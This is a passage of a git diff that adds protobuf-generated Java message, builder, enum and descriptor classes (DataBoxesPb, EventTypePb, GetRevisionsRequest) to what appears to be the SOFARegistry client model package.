1; + private java.util.List data_; + /** repeated .DataBoxPb data = 1; */ + public java.util.List getDataList() { + return data_; + } + /** repeated .DataBoxPb data = 1; */ + public java.util.List< + ? extends com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + getDataOrBuilderList() { + return data_; + } + /** repeated .DataBoxPb data = 1; */ + public int getDataCount() { + return data_.size(); + } + /** repeated .DataBoxPb data = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getData(int index) { + return data_.get(index); + } + /** repeated .DataBoxPb data = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder getDataOrBuilder( + int index) { + return data_.get(index); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + for (int i = 0; i < data_.size(); i++) { + output.writeMessage(1, data_.get(i)); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + for (int i = 0; i < data_.size(); i++) { + size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, data_.get(i)); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb other = + (com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb) obj; + + boolean result = true; + result = result && getDataList().equals(other.getDataList()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (getDataCount() > 0) { + hash = (37 * hash) + DATA_FIELD_NUMBER; + hash = (53 * hash) + getDataList().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom(byte[] data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code DataBoxesPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:DataBoxesPb) + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxesPbOuterClass + .internal_static_DataBoxesPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxesPbOuterClass + .internal_static_DataBoxesPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb.class, + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { + getDataFieldBuilder(); + } + } + + public Builder clear() { + super.clear(); + if (dataBuilder_ == null) { + data_ = java.util.Collections.emptyList(); + bitField0_ = (bitField0_ & ~0x00000001); + } else { + dataBuilder_.clear(); + } + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxesPbOuterClass + .internal_static_DataBoxesPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb build() { + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb result = + new com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb(this); + int from_bitField0_ = bitField0_; + if (dataBuilder_ == null) { + if (((bitField0_ & 0x00000001) == 0x00000001)) { + data_ = java.util.Collections.unmodifiableList(data_); + bitField0_ = (bitField0_ & ~0x00000001); + } + result.data_ = data_; + } else { + result.data_ = dataBuilder_.build(); + } + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb other) { + if (other == com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb.getDefaultInstance()) + return this; + if (dataBuilder_ == null) { + if (!other.data_.isEmpty()) { + if (data_.isEmpty()) { + data_ = other.data_; + bitField0_ = (bitField0_ & ~0x00000001); + } else { + ensureDataIsMutable(); + data_.addAll(other.data_); + } + onChanged(); + } + } else { + if (!other.data_.isEmpty()) { + if (dataBuilder_.isEmpty()) { + dataBuilder_.dispose(); + dataBuilder_ = null; + data_ = other.data_; + bitField0_ = (bitField0_ & ~0x00000001); + dataBuilder_ = + com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders + ? getDataFieldBuilder() + : null; + } else { + dataBuilder_.addAllMessages(other.data_); + } + } + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb) e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private java.util.List data_ = + java.util.Collections.emptyList(); + + private void ensureDataIsMutable() { + if (!((bitField0_ & 0x00000001) == 0x00000001)) { + data_ = + new java.util.ArrayList( + data_); + bitField0_ |= 0x00000001; + } + } + + private com.google.protobuf.RepeatedFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + dataBuilder_; + + /** repeated .DataBoxPb data = 1; */ + public java.util.List getDataList() { + if (dataBuilder_ == null) { + return java.util.Collections.unmodifiableList(data_); + } else { + return dataBuilder_.getMessageList(); + } + } + /** repeated .DataBoxPb data = 1; */ + public int getDataCount() { + if (dataBuilder_ == null) { + return data_.size(); + } else { + return dataBuilder_.getCount(); + } + } + /** repeated .DataBoxPb data = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getData(int index) { + if (dataBuilder_ == null) { + return data_.get(index); + } else { + return dataBuilder_.getMessage(index); + } + } + /** repeated .DataBoxPb data = 1; */ + public Builder setData( + int index, com.alipay.sofa.registry.common.model.client.pb.DataBoxPb value) { + if (dataBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + ensureDataIsMutable(); + data_.set(index, value); + onChanged(); + } else { + dataBuilder_.setMessage(index, value); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public Builder setData( + int index, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder builderForValue) { + if (dataBuilder_ == null) { + ensureDataIsMutable(); + data_.set(index, builderForValue.build()); + onChanged(); + } else { + dataBuilder_.setMessage(index, builderForValue.build()); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public Builder addData(com.alipay.sofa.registry.common.model.client.pb.DataBoxPb value) { + if (dataBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + ensureDataIsMutable(); + data_.add(value); + onChanged(); + } else { + dataBuilder_.addMessage(value); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public Builder addData( + int index, com.alipay.sofa.registry.common.model.client.pb.DataBoxPb value) { + if (dataBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + ensureDataIsMutable(); + data_.add(index, value); + onChanged(); + } else { + dataBuilder_.addMessage(index, value); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public Builder addData( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder builderForValue) { + if (dataBuilder_ == null) { + ensureDataIsMutable(); + data_.add(builderForValue.build()); + onChanged(); + } else { + dataBuilder_.addMessage(builderForValue.build()); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public Builder addData( + int index, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder builderForValue) { + if (dataBuilder_ == null) { + ensureDataIsMutable(); + data_.add(index, builderForValue.build()); + onChanged(); + } else { + dataBuilder_.addMessage(index, builderForValue.build()); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public Builder addAllData( + java.lang.Iterable + values) { + if (dataBuilder_ == null) { + ensureDataIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, data_); + onChanged(); + } else { + dataBuilder_.addAllMessages(values); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public Builder clearData() { + if (dataBuilder_ == null) { + data_ = java.util.Collections.emptyList(); + bitField0_ = (bitField0_ & ~0x00000001); + onChanged(); + } else { + dataBuilder_.clear(); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public Builder removeData(int index) { + if (dataBuilder_ == null) { + ensureDataIsMutable(); + data_.remove(index); + onChanged(); + } else { + dataBuilder_.remove(index); + } + return this; + } + /** repeated .DataBoxPb data = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder getDataBuilder( + int index) { + return getDataFieldBuilder().getBuilder(index); + } + /** repeated .DataBoxPb data = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder getDataOrBuilder( + int index) { + if (dataBuilder_ == null) { + return data_.get(index); + } else { + return dataBuilder_.getMessageOrBuilder(index); + } + } + /** repeated .DataBoxPb data = 1; */ + public java.util.List< + ? extends com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + getDataOrBuilderList() { + if (dataBuilder_ != null) { + return dataBuilder_.getMessageOrBuilderList(); + } else { + return java.util.Collections.unmodifiableList(data_); + } + } + /** repeated .DataBoxPb data = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder addDataBuilder() { + return getDataFieldBuilder() + .addBuilder( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance()); + } + /** repeated .DataBoxPb data = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder addDataBuilder( + int index) { + return getDataFieldBuilder() + .addBuilder( + index, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance()); + } + /** repeated .DataBoxPb data = 1; */ + public java.util.List + getDataBuilderList() { + return getDataFieldBuilder().getBuilderList(); + } + + private com.google.protobuf.RepeatedFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + getDataFieldBuilder() { + if (dataBuilder_ == null) { + dataBuilder_ = + new com.google.protobuf.RepeatedFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder>( + data_, + ((bitField0_ & 0x00000001) == 0x00000001), + getParentForChildren(), + isClean()); + data_ = null; + } + return dataBuilder_; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:DataBoxesPb) + } + + // @@protoc_insertion_point(class_scope:DataBoxesPb) + private static final com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public DataBoxesPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new DataBoxesPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPbOrBuilder.java new file mode 100644 index 000000000..400cae653 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPbOrBuilder.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface DataBoxesPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:DataBoxesPb) + com.google.protobuf.MessageOrBuilder { + + /** repeated .DataBoxPb data = 1; */ + java.util.List getDataList(); + /** repeated .DataBoxPb data = 1; */ + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getData(int index); + /** repeated .DataBoxPb data = 1; */ + int getDataCount(); + /** repeated .DataBoxPb data = 1; */ + java.util.List + getDataOrBuilderList(); + /** repeated .DataBoxPb data = 1; */ + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder getDataOrBuilder(int index); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPbOuterClass.java new file mode 100644 index 000000000..cdad25fdb --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPbOuterClass.java @@ -0,0 +1,70 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class DataBoxesPbOuterClass { + private DataBoxesPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor internal_static_DataBoxesPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_DataBoxesPb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\021DataBoxesPb.proto\032\017DataBoxPb.proto\"\'\n\013" + + "DataBoxesPb\022\030\n\004data\030\001 \003(\0132\n.DataBoxPbB7\n" + + "/com.alipay.sofa.registry.common.model.c" + + "lient.pbP\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, + new com.google.protobuf.Descriptors.FileDescriptor[] { + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass.getDescriptor(), + }, + assigner); + internal_static_DataBoxesPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_DataBoxesPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_DataBoxesPb_descriptor, + new java.lang.String[] { + "Data", + }); + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass.getDescriptor(); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/EventTypePb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/EventTypePb.java new file mode 100644 index 000000000..4a311b827 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/EventTypePb.java @@ -0,0 +1,102 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf enum {@code EventTypePb} */ +public enum EventTypePb implements com.google.protobuf.ProtocolMessageEnum { + /** REGISTER = 0; */ + REGISTER(0), + /** UNREGISTER = 1; */ + UNREGISTER(1), + UNRECOGNIZED(-1), + ; + + /** REGISTER = 0; */ + public static final int REGISTER_VALUE = 0; + /** UNREGISTER = 1; */ + public static final int UNREGISTER_VALUE = 1; + + public final int getNumber() { + if (this == UNRECOGNIZED) { + throw new java.lang.IllegalArgumentException( + "Can't get the number of an unknown enum value."); + } + return value; + } + + /** @deprecated Use {@link #forNumber(int)} instead. */ + @java.lang.Deprecated + public static EventTypePb valueOf(int value) { + return forNumber(value); + } + + public static EventTypePb forNumber(int value) { + switch (value) { + case 0: + return REGISTER; + case 1: + return UNREGISTER; + default: + return null; + } + } + + public static com.google.protobuf.Internal.EnumLiteMap internalGetValueMap() { + return internalValueMap; + } + + private static final com.google.protobuf.Internal.EnumLiteMap internalValueMap = + new com.google.protobuf.Internal.EnumLiteMap() { + public EventTypePb findValueByNumber(int number) { + return EventTypePb.forNumber(number); + } + }; + + public final com.google.protobuf.Descriptors.EnumValueDescriptor getValueDescriptor() { + return getDescriptor().getValues().get(ordinal()); + } + + public final com.google.protobuf.Descriptors.EnumDescriptor getDescriptorForType() { + return getDescriptor(); + } + + public static final com.google.protobuf.Descriptors.EnumDescriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.EventTypePbOuterClass.getDescriptor() + .getEnumTypes() + .get(0); + } + + private static final EventTypePb[] VALUES = values(); + + public static EventTypePb valueOf(com.google.protobuf.Descriptors.EnumValueDescriptor desc) { + if (desc.getType() != getDescriptor()) { + throw new java.lang.IllegalArgumentException("EnumValueDescriptor is not for this type."); + } + if (desc.getIndex() == -1) { + return UNRECOGNIZED; + } + return VALUES[desc.getIndex()]; + } + + private final int value; + + private EventTypePb(int value) { + this.value = value; + } + + // @@protoc_insertion_point(enum_scope:EventTypePb) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/EventTypePbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/EventTypePbOuterClass.java new file mode 100644 index 000000000..e96631c2a --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/EventTypePbOuterClass.java @@ -0,0 +1,54 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class EventTypePbOuterClass { + private EventTypePbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\021EventTypePb.proto*+\n\013EventTypePb\022\014\n\010RE" + + "GISTER\020\000\022\016\n\nUNREGISTER\020\001B7\n/com.alipay.s" + + "ofa.registry.common.model.client.pbP\001Z\002p" + + "bb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] {}, assigner); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsRequest.java new file mode 100644 index 000000000..520b7757f --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsRequest.java @@ -0,0 +1,562 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code GetRevisionsRequest} */ +public final class GetRevisionsRequest extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:GetRevisionsRequest) + GetRevisionsRequestOrBuilder { + private static final long serialVersionUID = 0L; + // Use GetRevisionsRequest.newBuilder() to construct. + private GetRevisionsRequest(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private GetRevisionsRequest() { + revisions_ = com.google.protobuf.LazyStringArrayList.EMPTY; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private GetRevisionsRequest( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + if (!((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = new com.google.protobuf.LazyStringArrayList(); + mutable_bitField0_ |= 0x00000001; + } + revisions_.add(s); + break; + } + } + } + } catch 